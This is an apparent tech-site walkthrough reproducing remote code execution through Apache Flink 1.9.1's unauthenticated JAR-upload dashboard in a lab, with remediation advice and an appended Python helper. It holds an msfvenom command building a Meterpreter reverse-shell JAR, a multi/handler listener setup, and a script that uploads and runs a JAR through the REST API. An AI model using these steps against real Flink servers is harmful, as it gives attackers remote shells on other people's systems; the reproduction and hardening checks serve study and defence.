2025-01-23 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article walks through "Apache Flink arbitrary JAR upload to RCE: vulnerability reproduction and analysis". The steps are simple and presented in order, so follow along with the editor to reproduce and understand the issue.
0x00 Introduction
Apache Flink has been one of the hottest data processing engines of recent years. It is widely adopted by major vendors, runs in production business scenarios, and is on the shortlist of many companies choosing a stream-processing engine.
What can Apache Flink be used for?
Real-time recommendation system
Real-time report
Real-time data warehouse and ETL
Complex event processing
Real-time Fraud and Real-time Credit Evaluation
Big data security monitoring
At Flink's core is a streaming dataflow execution engine that provides data distribution, communication, and fault tolerance for distributed computation over data streams. On top of that engine, Flink offers several higher-level APIs for writing distributed jobs.
0x01 Vulnerability introduction
An attacker who can reach the Apache Flink Dashboard (the JobManager web UI, port 8081 by default) can upload an arbitrary JAR through the Submit New Job page and run it. The JobManager loads the JAR and executes its main class, which yields remote code execution with the privileges of the Flink process. The dashboard ships with no authentication, so anyone with network access to the port can do this.
0x02 Scope of impact
Reproduced here on Apache Flink 1.9.1. JAR submission from the web UI is a standard dashboard feature rather than a bug in one release, so any version whose dashboard is exposed without authentication in front of it is affected in the same way.
0x03 Environment setup
Attacker machine (Kali): 192.168.10.147
Target machine (Ubuntu): 192.168.10.176
Test environment: Flink 1.9.1, Java 8+
Download the Apache Flink 1.9.1 binary package:
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
After the download completes, unpack it:
tar zxvf flink-1.9.1-bin-scala_2.11.tgz
Enter the bin directory and run ./start-cluster.sh to start a local cluster.
Once the cluster is up, the target dashboard is reachable at http://192.168.10.176:8081
0x04 Vulnerability reproduction
On Kali, generate a JAR backdoor with msfvenom:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=2020 -f jar > shell.jar
From the attacker machine, open the target dashboard, go to Submit New Job, and upload shell.jar.
On Kali, start a listener in msfconsole (the payload must match the one given to msfvenom, and multi/handler takes LHOST, not RHOST):
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.10.147
set LPORT 2020
run
Back in the dashboard, click the uploaded shell.jar and submit it. The JobManager runs the JAR's main class, the payload connects back to the listener, and a Meterpreter session opens on Kali.
0x05 Remediation
There is no single patch for this: JAR submission is a dashboard feature, so the fix is to keep the JobManager REST port off untrusted networks (bind it to an internal interface and firewall it), put the dashboard behind an authenticating reverse proxy, and set web.submit.enable: false in flink-conf.yaml so jobs cannot be uploaded and run from the web UI at all. Keep Flink updated to the latest release as well.
That is the whole walkthrough of reproducing the RCE caused by arbitrary JAR upload in Apache Flink. Thanks for reading, and I hope it helps.
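The dashboard click in 0x04 is a front end for the JobManager's REST API, and the hardening in 0x05 is a one-line config change. The following script is an added example for this article (not the article's own code, and not Flink project code): it builds the same upload and run requests the UI sends, parses the upload response, and checks a flink-conf.yaml for the web.submit.enable setting. It assumes the REST endpoints GET /jars, POST /jars/upload (multipart field "jarfile") and POST /jars/<jarid>/run on port 8081, and the config keys web.submit.enable and rest.bind-address; the upload response and config texts below are constructed samples, not captured from a real cluster. Only the guarded main block touches the network.

```python
"""Added example (not from the original article): what the dashboard click does
over Flink's REST API, plus a check for the hardening setting in flink-conf.yaml.

Assumptions not stated on the page: REST endpoints POST /jars/upload (multipart
field "jarfile") and POST /jars/<jarid>/run on port 8081, and the config keys
web.submit.enable / rest.bind-address. Sample data below is constructed."""
import json
import os
import uuid
import urllib.request


def encode_multipart(field, filename, content, boundary=None):
    """Build a multipart/form-data body and Content-Type for one file field.
    The dashboard uploads the JAR under the form field name "jarfile"."""
    boundary = boundary or uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/java-archive\r\n\r\n"
    ).encode()
    body = head + content + f"\r\n--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"


def jar_id_from_upload(response_text):
    """Extract the server-side jar id from the upload response. Flink answers
    {"filename": ".../flink-web-upload/<uuid>_<name>.jar", "status": "success"};
    the id used by the /jars/<jarid>/... endpoints is the basename."""
    data = json.loads(response_text)
    if data.get("status") != "success":
        raise RuntimeError(f"upload failed: {response_text}")
    return os.path.basename(data["filename"])


def run_url(base_url, jar_id):
    """Endpoint that starts the uploaded JAR as a job, i.e. runs its main class."""
    return f"{base_url.rstrip('/')}/jars/{jar_id}/run"


def upload_and_run(base_url, jar_path):
    """Network side: upload the JAR and start it. Not exercised offline."""
    with open(jar_path, "rb") as f:
        body, ctype = encode_multipart("jarfile", os.path.basename(jar_path), f.read())
    req = urllib.request.Request(f"{base_url.rstrip('/')}/jars/upload", data=body,
                                 headers={"Content-Type": ctype}, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        jar_id = jar_id_from_upload(resp.read().decode())
    req = urllib.request.Request(run_url(base_url, jar_id), data=b"{}",
                                 headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read().decode())  # {"jobid": "..."} when the job starts


def web_submit_enabled(conf_text):
    """Parse flink-conf.yaml text (simple key: value lines) and report whether the
    dashboard still accepts JAR submission. A missing key means the default, true."""
    for line in conf_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        if key.strip() == "web.submit.enable":
            return value.strip().lower() != "false"
    return True


# Constructed samples (not captured from a real cluster)
SAMPLE_UPLOAD_RESPONSE = ('{"filename":"/tmp/flink-web-9a1b/flink-web-upload/'
                          '5f2c1d0e-aaaa-bbbb-cccc-1234567890ab_shell.jar","status":"success"}')
WEAK_CONF = "jobmanager.rpc.address: localhost\nrest.port: 8081\n"
HARDENED_CONF = WEAK_CONF + "web.submit.enable: false\nrest.bind-address: 127.0.0.1\n"

if __name__ == "__main__":
    print("jar id:", jar_id_from_upload(SAMPLE_UPLOAD_RESPONSE))
    print("weak conf accepts uploads:", web_submit_enabled(WEAK_CONF))
    print("hardened conf accepts uploads:", web_submit_enabled(HARDENED_CONF))
    # Against the lab target from the article (needs the msfvenom JAR and a listener):
    # print(upload_and_run("http://192.168.10.176:8081", "shell.jar"))
```

Running the script offline prints the parsed jar id and shows the weak config still accepting uploads while the hardened one does not; uncommenting the last line performs the same upload-and-run the dashboard click does, which is also why a defender should alert on POST /jars/upload and POST /jars/*/run reaching a JobManager from outside the cluster network.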
© 2024 shulou.com SLNews company. All rights reserved.